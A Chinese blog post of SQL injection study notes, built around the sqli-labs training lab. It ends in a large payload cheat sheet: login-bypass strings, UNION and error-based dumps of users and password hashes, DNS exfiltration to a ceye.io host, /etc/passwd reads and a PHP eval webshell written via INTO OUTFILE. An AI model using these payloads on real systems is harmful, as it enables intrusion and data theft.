<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#fff">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



















  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="https://fonts.loli.net/css?family=Noto Serif SC:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.4.1" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/fish-32x32.png?v=6.4.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/fish-16x16.png?v=6.4.1">


  <link rel="mask-icon" href="/images/logo.svg?v=6.4.1" color="#fff">



  <meta name="msapplication-config" content="/images/browserconfig.xml">







<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.4.1',
    sidebar: {"position":"right","display":"hide","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="1. OSI七层模型 物理层 、数据链路层、网络层、传输层、会话层、表示层、应用层  2. TCP三次握手 （1）客户端发送SYN（SEQ=x）报文给服务器端，进入SYN_SEND状态。 （2）服务器端收到SYN报文，回应一个SYN （SEQ=y）ACK(ACK=x+1）报文，进入SYN_RECV状态。 （3）客户端收到服务器端的SYN报文，回应一个ACK(ACK=y+1）报文，进入Establi">
<meta name="keywords" content="Hexo,博客">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入漏洞">
<meta property="og:url" content="https://yingyingguaier.github.io/2018/10/01/SQL注入漏洞/index.html">
<meta property="og:site_name" content="0menc&#39;s Blog">
<meta property="og:description" content="1. OSI七层模型 物理层 、数据链路层、网络层、传输层、会话层、表示层、应用层  2. TCP三次握手 （1）客户端发送SYN（SEQ=x）报文给服务器端，进入SYN_SEND状态。 （2）服务器端收到SYN报文，回应一个SYN （SEQ=y）ACK(ACK=x+1）报文，进入SYN_RECV状态。 （3）客户端收到服务器端的SYN报文，回应一个ACK(ACK=y+1）报文，进入Establi">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-06-19T18:51:35.110Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入漏洞">
<meta name="twitter:description" content="1. OSI七层模型 物理层 、数据链路层、网络层、传输层、会话层、表示层、应用层  2. TCP三次握手 （1）客户端发送SYN（SEQ=x）报文给服务器端，进入SYN_SEND状态。 （2）服务器端收到SYN报文，回应一个SYN （SEQ=y）ACK(ACK=x+1）报文，进入SYN_RECV状态。 （3）客户端收到服务器端的SYN报文，回应一个ACK(ACK=y+1）报文，进入Establi">






  <link rel="canonical" href="https://yingyingguaier.github.io/2018/10/01/SQL注入漏洞/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>SQL注入漏洞 | 0menc's Blog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">0menc's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">学习、踩坑及经验分享</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>Categories</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-commonweal">
    <a href="/404.html" rel="section">
      <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>Commonweal 404</a>
  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://yingyingguaier.github.io/2018/10/01/SQL注入漏洞/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="嘤嘤怪er">
      <meta itemprop="description" content="0menc">
      <meta itemprop="image" content="/images/jack.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="0menc's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入漏洞
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-10-01 20:46:26" itemprop="dateCreated datePublished" datetime="2018-10-01T20:46:26+08:00">2018-10-01</time>
            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/sql注入/" itemprop="url" rel="index"><span itemprop="name">sql注入</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="1-OSI七层模型"><a href="#1-OSI七层模型" class="headerlink" title="1. OSI七层模型"></a>1. OSI七层模型</h3><ul>
<li>物理层 、数据链路层、网络层、传输层、会话层、表示层、应用层</li>
</ul>
<h3 id="2-TCP三次握手"><a href="#2-TCP三次握手" class="headerlink" title="2. TCP三次握手"></a>2. TCP三次握手</h3><ul>
<li>（1）客户端发送SYN（SEQ=x）报文给服务器端，进入SYN_SEND状态。</li>
<li>（2）服务器端收到SYN报文，回应一个SYN （SEQ=y）ACK(ACK=x+1）报文，进入<a href="https://baike.baidu.com/item/SYN_RECV" target="_blank" rel="noopener">SYN_RECV</a>状态。</li>
<li>（3）客户端收到服务器端的SYN报文，回应一个ACK(ACK=y+1）报文，进入Established状态。</li>
</ul>
<h3 id="3-TCP四次分手"><a href="#3-TCP四次分手" class="headerlink" title="3. TCP四次分手"></a>3. TCP四次分手</h3><ul>
<li>（1）某个应用进程首先调用close，称该端执行“主动关闭”（active close）。该端的TCP于是发送一个FIN分节，表示数据发送完毕。</li>
<li>(2) 接收到这个FIN的对端执行 “被动关闭”（passive close），这个FIN由TCP确认。</li>
<li>(3) 一段时间后，接收到这个文件结束符的应用进程将调用close关闭它的套接字。这导致它的TCP也发送一个FIN。</li>
<li>(4) 接收这个最终FIN的原发送端TCP（即执行主动关闭的那一端）确认这个FIN。 </li>
</ul>
<h3 id="4-HTTP状态码"><a href="#4-HTTP状态码" class="headerlink" title="4. HTTP状态码"></a>4. HTTP状态码</h3><ul>
<li>2XX  成功</li>
<li>3XX  跳转</li>
<li>4XX  错误</li>
<li>5XX   服务器错误</li>
</ul>
<h3 id="5-常用端口"><a href="#5-常用端口" class="headerlink" title="5.  常用端口"></a>5.  常用端口</h3><ul>
<li>21   FTP</li>
<li>22  SSH</li>
<li>23  Telent</li>
<li>25   SMTP</li>
<li>53   DNS</li>
<li>80   HTTP</li>
<li>135 </li>
<li>139 </li>
<li>443  HTTPS</li>
<li>445  SMB</li>
<li>1433  SQLSERVER</li>
<li>1521   ORCAL</li>
<li>3306  MYSQL</li>
<li>3389   rdp</li>
<li>4899    远程桌面</li>
<li>5900-59XX   VNC</li>
<li>8080  管理端口</li>
</ul>
<h3 id="6-数据库基础"><a href="#6-数据库基础" class="headerlink" title="6. 数据库基础"></a>6. 数据库基础</h3><h4 id="主流数据库"><a href="#主流数据库" class="headerlink" title="主流数据库"></a>主流数据库</h4><ul>
<li>SQL SERVER</li>
<li>MYSQL</li>
<li>oraccle</li>
<li>PostgreSQL</li>
<li>可以使用  Navicat premium  连接数据库</li>
</ul>
<h4 id="数据库查询版本"><a href="#数据库查询版本" class="headerlink" title="数据库查询版本"></a>数据库查询版本</h4><ul>
<li>Mssql   select  @@version</li>
<li>Mysql    select  vresion（）/select @@version</li>
<li>oracle    select banner from ￥version</li>
<li>Postgresql  select version（）</li>
</ul>
<h4 id="SQL语法基础"><a href="#SQL语法基础" class="headerlink" title="SQL语法基础"></a>SQL语法基础</h4><ul>
<li><p>库操作</p>
<ul>
<li>连接数据库   mysql  -u  用户名 -p</li>
<li>创建数据库：create database  数据库名称、</li>
<li>删除数据库    drop  database 数据库名称、</li>
<li>列出数据库  show databases</li>
<li>使用数据据库  use 数据库名称、</li>
<li>查看当前数据库   select database（）</li>
</ul>
</li>
<li><p>表操作</p>
<ul>
<li>新建表create table  表名（键 varchar（10），键int（10））</li>
<li>列出表  show tables</li>
<li>删除表  delete  表名</li>
</ul>
</li>
<li><p>数据操作</p>
<ul>
<li><p>增加数据insert into  表名（键，键）values（值，值）</p>
</li>
<li><p>删除数据 delete from 表名 where  键=值（删除某一行数据）</p>
</li>
<li><p>修改数据 updata 表名 set 键 = 值 where 键=值</p>
</li>
<li><p>查询数据  select * fom 表名</p>
<p>存放数据库 information_ schema（存放schemata、  table、columns等等）     </p>
<p>存放数据库名  schemata</p>
<p>表  table</p>
<p>字段  columns</p>
</li>
</ul>
</li>
</ul>
<h3 id="7-注入漏洞"><a href="#7-注入漏洞" class="headerlink" title="7.  注入漏洞"></a>7.  注入漏洞</h3><h4 id="注入概述"><a href="#注入概述" class="headerlink" title="注入概述"></a>注入概述</h4><ul>
<li>什么是注入漏洞、<ul>
<li>注入攻击的本质，Web应用程序没有过滤用户输入*，直接把用户输入的恶意数据当做代码执行</li>
<li>两个条件<ul>
<li>用户能够控制输入</li>
<li>原本程序要执行的代码，拼接了用户输入的数据</li>
</ul>
</li>
</ul>
</li>
</ul>
<h4 id="注入类型"><a href="#注入类型" class="headerlink" title="注入类型"></a>注入类型</h4><ul>
<li>SQL注入：攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗数据库服务器执行恶意的SQL命令命令注入：后端未过滤掉恶意数据，代码当做系统命令执行。</li>
<li>代码注入：一般出现在不安全的使用某些函数<ul>
<li>文件包含</li>
<li>反序列化漏洞</li>
</ul>
</li>
<li>LDAP注入<ul>
<li>LDAP（轻量级目录访问协议），用于访问网络中的目录服务，常用在Active Directory，企业管理目录。<br>用户提交的输入不经验证插入LDAP搜索过滤器中，攻击者通过提交专门设计的输入修改过滤器的结构，以检索数据或执行未授权操作</li>
</ul>
</li>
<li>XML注入<ul>
<li>XXE漏洞：引用外部实体时，通过构造恶意内容，导致读取任意文件、<br>执行系统命令、探测内网端口、攻击内网网站等危害。</li>
<li>XPath注入：与SQL注入类似，XPath解析器本身对URL、表单中提交的代码内容未作严格限制，导致恶意代码可以直接解析执行</li>
<li>XQuery注入</li>
</ul>
</li>
<li>JSON注入：轻量级的数据交换格式，主要利用特殊字符注入JSON中，造成解析失败</li>
<li>JSONP注入：回调函数未作严格的检测和过滤</li>
<li>判断一个HTTP请求是否存在SQL注入的方式：<ul>
<li>经典：and1=1|and2&gt;1|or1=1 |or1&lt;1</li>
<li>数据库函数：and sleep（4】=1 I and length（user（）】&gt;3</li>
<li>特殊符号：单引号（’）双引号（”）</li>
</ul>
</li>
</ul>
<h4 id="注入点"><a href="#注入点" class="headerlink" title="注入点"></a>注入点</h4><ul>
<li>GET</li>
<li>POST</li>
<li>Cookie</li>
<li>Host</li>
<li>User-Agent</li>
</ul>
<h4 id="自动化注入工具"><a href="#自动化注入工具" class="headerlink" title="自动化注入工具"></a>自动化注入工具</h4><ul>
<li>（1）SQL注入工具：<ul>
<li>Sqlmap Havij Sqlid</li>
</ul>
</li>
<li>（2）ASP，JSP注入工具：<ul>
<li>NBSI阿D注入软件明小子注入软件</li>
</ul>
</li>
<li>（3）PHP注入工具：<ul>
<li>穿山甲注入软件海阳顶端注入软件</li>
</ul>
</li>
</ul>
<h3 id="8-SQL手工注入步骤"><a href="#8-SQL手工注入步骤" class="headerlink" title="8. SQL手工注入步骤"></a>8. SQL手工注入步骤</h3><h4 id="注入点寻找"><a href="#注入点寻找" class="headerlink" title="注入点寻找"></a>注入点寻找</h4><ul>
<li><p>判断请求方式</p>
<ul>
<li>浏览器F12  点网络</li>
</ul>
</li>
<li><p>单引号闭合’  ‘</p>
</li>
<li><p>数字</p>
</li>
<li><p>单引号括号闭合（’ ‘）</p>
</li>
<li><p>双引号括号闭合（“ ”）</p>
</li>
<li><p>or 1=1</p>
</li>
<li><p>or 1=2</p>
</li>
<li><p>and 1=1</p>
</li>
<li><p>and 1=2</p>
</li>
<li><h4 id="数字型注入"><a href="#数字型注入" class="headerlink" title="数字型注入"></a>数字型注入</h4><ul>
<li>加单引号  错误出异常</li>
<li>and 1=1   正常</li>
<li>and   1=2  异常</li>
</ul>
</li>
<li><h4 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h4><ul>
<li>加单引号  错误出异常</li>
<li>and ‘1’ = ‘1  正常</li>
<li>and ‘1’ = ‘2  异常</li>
</ul>
</li>
</ul>
<h4 id="判断字段长度"><a href="#判断字段长度" class="headerlink" title="判断字段长度"></a>判断字段长度</h4><ul>
<li>order  by  数字   可以判断字段的个数</li>
<li>也可以用猜字段  union  select 1，2，3</li>
</ul>
<h4 id="判断字段回显位置"><a href="#判断字段回显位置" class="headerlink" title="判断字段回显位置"></a>判断字段回显位置</h4><p>在链接后面添加语句<code>【 union select 1,2,3,4,5,6,7,8,9,10,11#】</code>进行联合查询（联合查询时记得把前面的查询为空）来暴露可查询的字段号。 </p>
<h4 id="判断数据库注入"><a href="#判断数据库注入" class="headerlink" title="判断数据库注入"></a>判断数据库注入</h4><p>利用内置函数暴数据库信息<br>version()版本；database()数据库；user()用户；<br>不用猜解可用字段暴数据库信息(有些网站不适用):<br>and 1=2 union all select version()<br>and 1=2 union all select database()<br>and 1=2 union all select user()<br>操作系统信息：and 1=2 union all select @@global.version_compile_os from mysql.user<br>数据库权限：<br>and ord(mid(user(),1,1))=114 返回正常说明为root </p>
<h4 id="查找数据库名"><a href="#查找数据库名" class="headerlink" title="查找数据库名"></a>查找数据库名</h4><ul>
<li><p>GET：IP/Less-1/?id=100’ union select 1,(select database()),3–+</p>
</li>
<li><p>POST：union select 1,(select group_concat(schema_name) from information_schema.schemata),3–+</p>
</li>
<li><p>查看数据库长度length（） and length(database())&gt;10–+</p>
</li>
<li><p>查看数据库名字mid（）或者left    </p>
<ul>
<li><p>mid (string，start，length）返回指定的字符串从指定位置开始（可以用来猜数据库名 ） and mid(database(),1,1)&gt;’a’</p>
</li>
<li><p>left (string,lenth)  返回最左边指定的字符数</p>
<p>and left(database(),1)&gt;’a’  (猜名字)</p>
</li>
</ul>
</li>
<li><p>将查到的库名放到同一个字符串</p>
<ul>
<li>select GROUP_CONCAT(schema_name) from information_schema.schemata</li>
</ul>
</li>
<li><p>查到数单个据库名发送到ceye</p>
<ul>
<li>union select 1,(select load_file(concat(‘\\‘,substr((select schema_name from information_schema.schemata  limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+</li>
</ul>
</li>
</ul>
<h4 id="查找数据表"><a href="#查找数据表" class="headerlink" title="查找数据表"></a>查找数据表</h4><ul>
<li><p>union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=’security’) ,3 </p>
</li>
<li><p>将单个表名发送到ceye</p>
<p>uname=1’) union select 3,(select load_file(concat(‘\\‘,substr((select table_name from information_schema.tables where table_schema =’security’  limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+</p>
</li>
</ul>
<h4 id="查找数据表中所有字段（列）"><a href="#查找数据表中所有字段（列）" class="headerlink" title="查找数据表中所有字段（列）"></a>查找数据表中所有字段（列）</h4><ul>
<li><h4 id="127-0-0-1-Less-3-id-100’-union-select-1-select-group-concat-column-name-from-information-schema-columns-where-table-name-’users’-and-table-schema-’security’-–"><a href="#127-0-0-1-Less-3-id-100’-union-select-1-select-group-concat-column-name-from-information-schema-columns-where-table-name-’users’-and-table-schema-’security’-–" class="headerlink" title="127.0.0.1/Less-3/?id=100’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’) –+"></a>127.0.0.1/Less-3/?id=100’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’) –+</h4></li>
<li><p>获取内容</p>
<ul>
<li>union select 1,(select group_concat(username) from security.users limit 0,1),3 </li>
</ul>
</li>
<li><p>查询某一个表的字段名发送到ceye</p>
<ul>
<li>union select 1,(select load_file(concat(‘\\‘,substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 1),1,41),’.mysql.ip.port.38ljf2.ceye.io\abc’)))–+</li>
</ul>
</li>
</ul>
<h4 id="猜解账号密码"><a href="#猜解账号密码" class="headerlink" title="猜解账号密码"></a>猜解账号密码</h4><ul>
<li><p>outfile文件注入</p>
<ul>
<li>union select 1,’<?php @eval($_POST[360]);?>‘ into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-8\3.php’–+</li>
<li>into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-13\1.txt’</li>
</ul>
</li>
<li><p>查root密码ceye代码</p>
<p>127.0.0.1/Less-1/?id=1’ union SELECT 1,(LOAD_FILE(CONCAT(‘\\‘,mid((SELECT password FROM mysql.user WHERE user=’root’ LIMIT 1),2,41),’.mysql.ip.port.38ljf2.ceye.io\abc’))),3–+</p>
</li>
<li><p>bug   </p>
<p>uname=1’) or 1=1 into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-13\1.txt’;–+</p>
<p>这个文件里会有所有的用户名和密码</p>
</li>
<li><p>查询数据</p>
<p>union select 1,(select 1 from (select count(<em>),concat((select(select(select distinct concat(username,password) from users limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)</em>2))x from information_schema.tables group by x)a) –+</p>
</li>
</ul>
<h4 id="绕过登陆验证"><a href="#绕过登陆验证" class="headerlink" title="绕过登陆验证"></a>绕过登陆验证</h4><ul>
<li>admin’ –</li>
<li>admin’ #</li>
<li>admin’/*</li>
<li>‘ or 1=1–</li>
<li>‘ or 1=1#</li>
<li>‘ or 1=1/*</li>
<li>‘) or ‘1’=’1–</li>
<li>‘) or (‘1’=’1–</li>
</ul>
<h4 id="SQL注入常见函数"><a href="#SQL注入常见函数" class="headerlink" title="SQL注入常见函数"></a>SQL注入常见函数</h4><ul>
<li><p>group_concat函数   可以把查询的内容组合成一个字符串</p>
</li>
<li><p>load_file(file name )  读取文件并将文件按字符串返回</p>
</li>
<li><p>left（string，length）返回最左边指定的字符数：<br>left（database（），1）&gt;’s’  (猜名字)</p>
</li>
<li><p>length（）判断长度<br>length（database（）&gt;5 </p>
</li>
<li><p>substr（a，b，c）从字符串a中截取 b到c长度</p>
</li>
<li><p>ascii（）将某个字符转为ascii值</p>
<p>ascii（substr（user（），1，1））=101#</p>
</li>
<li><p>mid（（a，b，c）从字符串a中截取 b到c位置（可以用来猜数据库名 ）</p>
</li>
</ul>
<h3 id="9-SQL注入备忘"><a href="#9-SQL注入备忘" class="headerlink" title="9. SQL注入备忘"></a>9. SQL注入备忘</h3><h4 id="SQL注入常用命令"><a href="#SQL注入常用命令" class="headerlink" title="SQL注入常用命令"></a>SQL注入常用命令</h4><ul>
<li><p>查看当前用户：union select 1,(select user())–+</p>
</li>
<li><p>查看数据库版本：union select 1,(select version())–+</p>
</li>
<li><p>查看当前数据库名：union select 1,(select database())–+</p>
</li>
<li><p>查看操作系统union select 1,(select @@version_compile_os)–+</p>
</li>
<li><p>所有用户：</p>
<ul>
<li><p>union select 1,(select group_concat(user) from mysql.user)–</p>
<p>+</p>
</li>
</ul>
</li>
<li><p>用户hash</p>
<ul>
<li>union select 1,(select group_concat(password) from mysql.user where user=’root’)</li>
</ul>
</li>
<li><p>查看所有数据库名</p>
<ul>
<li>union select 1,(SELECT group_concat(schema_name) from information_schema.schemata)–+</li>
</ul>
</li>
<li><p>查看某一个库的全部表</p>
<ul>
<li>union select 1,(SELECT group_concat(table_name) from information_schema.tables where table_schema=’库名’)–+</li>
<li>union select 1,(SELECT group_concat(table_name) from information_schema.table_constraints where table_schema=’库名’</li>
</ul>
</li>
<li><p>查看某个表的字段名</p>
<ul>
<li>union select 1,(SELECT group_concat(column_name) from information_schema.columns where table_name=’表名’)–+</li>
</ul>
</li>
<li><p>查看某个库中某个表的字段名</p>
<ul>
<li>union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’表名’ and table_schema=’库名’)–+</li>
</ul>
</li>
<li><p>读文件</p>
<ul>
<li>union select 1,(SELECT load_file(‘/etc/passwd’))–+</li>
</ul>
</li>
<li><p>写文件</p>
<ul>
<li>union select 1,’<?php @eval($_POST[360]);?>‘ into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less-8\3.php’–+</li>
</ul>
</li>
</ul>
<h4 id="UNION注入"><a href="#UNION注入" class="headerlink" title="UNION注入"></a>UNION注入</h4><ul>
<li>猜字段长度<ul>
<li>order by 数字     uname=1’ order by 2</li>
</ul>
</li>
<li>暴字段位置<ul>
<li>union select 1,2      uname=1’ union select 1,2</li>
</ul>
</li>
<li>在指定表中查询制指定用户的密码<ul>
<li>union SELECT 1,password from 表 where username=’用户名’–+</li>
</ul>
</li>
</ul>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><ul>
<li><p>floor   （SELECT user()可修改）</p>
<ul>
<li>OR (SELECT 8627 FROM(SELECT COUNT(<em>),CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)</em>2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)–+</li>
</ul>
</li>
<li><h3 id="ExtractValue-有长度限制-最长32位-（select-version可修改）"><a href="#ExtractValue-有长度限制-最长32位-（select-version可修改）" class="headerlink" title="ExtractValue(有长度限制,最长32位)   （select @@version可修改）"></a>ExtractValue(有长度限制,最长32位)   （select @@version可修改）</h3><ul>
<li>and extractvalue(1, concat(0x7e, (select @@version),0x7e))–+</li>
</ul>
</li>
<li><h3 id="UpdateXml-有长度限制-最长32位-（SELECT-version可修改）"><a href="#UpdateXml-有长度限制-最长32位-（SELECT-version可修改）" class="headerlink" title="UpdateXml(有长度限制,最长32位)  （SELECT @@version可修改）"></a>UpdateXml(有长度限制,最长32位)  （SELECT @@version可修改）</h3><ul>
<li>and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)–+</li>
</ul>
</li>
<li><h3 id="NAME-CONST-适用于低版本，不太好用"><a href="#NAME-CONST-适用于低版本，不太好用" class="headerlink" title="NAME_CONST(适用于低版本，不太好用)"></a>NAME_CONST(适用于低版本，不太好用)</h3><ul>
<li>and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)–+</li>
</ul>
</li>
<li><h3 id="Error-based-Double-Query-Injection"><a href="#Error-based-Double-Query-Injection" class="headerlink" title="Error based Double Query Injection"></a>Error based Double Query Injection</h3><ul>
<li>or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1–+</li>
</ul>
</li>
<li><h3 id="exp-5-5-5以上-（select-user-可修改）"><a href="#exp-5-5-5以上-（select-user-可修改）" class="headerlink" title="exp(5.5.5以上) （select user()可修改）"></a>exp(5.5.5以上) （select user()可修改）</h3><ul>
<li>and (select exp(~(select * from(select user())x)))–+</li>
</ul>
</li>
<li><p>floor(Mysql):  and (select 1 from (select count(<em>),concat(user(),floor(rand(0)</em>2))x from information_schema.tables group by x)a);</p>
</li>
<li><p>Extractvalue(Mysql):  and (extractvalue(1,concat(0x7e,(select user()),0x7e)));</p>
</li>
<li><p>Updatexml(Mysql):  and (updatexml(1,concat(0x7e,(select user()),0x7e),1));</p>
</li>
<li><p>EXP: and exp(~(select * from(select user())a));</p>
</li>
<li><p>UTL INADDR. get host address(Oracle): and 1=utl inaddrget host address(select bannerO from sys.v_$version where rownum=1))</p>
</li>
<li><p>multipoint(Mysql)：and multipoint((select * from(select * from(select user())a)b));</p>
</li>
<li><p>polygon(Mysql)：and polygon((select * from(select * from(select user())a)b));</p>
</li>
<li><p>multipolygon(Mysql)：and multipolygon((select * from(select * from(select user())a)b));</p>
</li>
<li><p>linestring(Mysql)：and linestring((select * from(select * from(select user())a)b));</p>
</li>
<li><p>multilinestring(Mysql)：and multilinestring((select * from(select * from(select user())a)b));</p>
</li>
</ul>
<h4 id="bool盲注"><a href="#bool盲注" class="headerlink" title="bool盲注"></a>bool盲注</h4><ul>
<li><p>盲注的时候一定注意，MySQL4之后大小写不敏感，可使用binary()函数使大小写敏感。</p>
</li>
<li><h5 id="布尔条件构造"><a href="#布尔条件构造" class="headerlink" title="布尔条件构造"></a>布尔条件构造</h5><ul>
<li><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">//正常情况</span><br><span class="line">'or bool<span class="comment">#</span></span><br><span class="line">true'and bool<span class="comment">#</span></span><br><span class="line">    </span><br><span class="line">//不使用空格、注释</span><br><span class="line">'or(bool)='1</span><br><span class="line">true'and(bool)='1</span><br><span class="line">    </span><br><span class="line">//不使用or、and、注释</span><br><span class="line">'^!(bool)='1</span><br><span class="line">'=(bool)='</span><br><span class="line">'||(bool)='1</span><br><span class="line">true'%26%26(bool)='1</span><br><span class="line">'=if((bool),1,0)='0</span><br><span class="line">    </span><br><span class="line">//不使用等号、空格、注释</span><br><span class="line">'or(bool)&lt;&gt;'0</span><br><span class="line">'or((bool)in(1))or'0</span><br><span class="line">    </span><br><span class="line">//其他</span><br><span class="line">or (case when (bool) then 1 else 0 <span class="keyword">end</span>)</span><br></pre></td></tr></table></figure>
</li>
<li><p>有时候where字句有括号又猜不到SQL语句的时候，可以有下列类似的fuzz</p>
</li>
<li><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1' or (bool) or '1'='1</span><br><span class="line">1%' and (bool) or 1=1 and '1'='1</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="构造逻辑判断"><a href="#构造逻辑判断" class="headerlink" title="构造逻辑判断"></a>构造逻辑判断</h5><ul>
<li><p>逻辑判断基本就那些函数：</p>
</li>
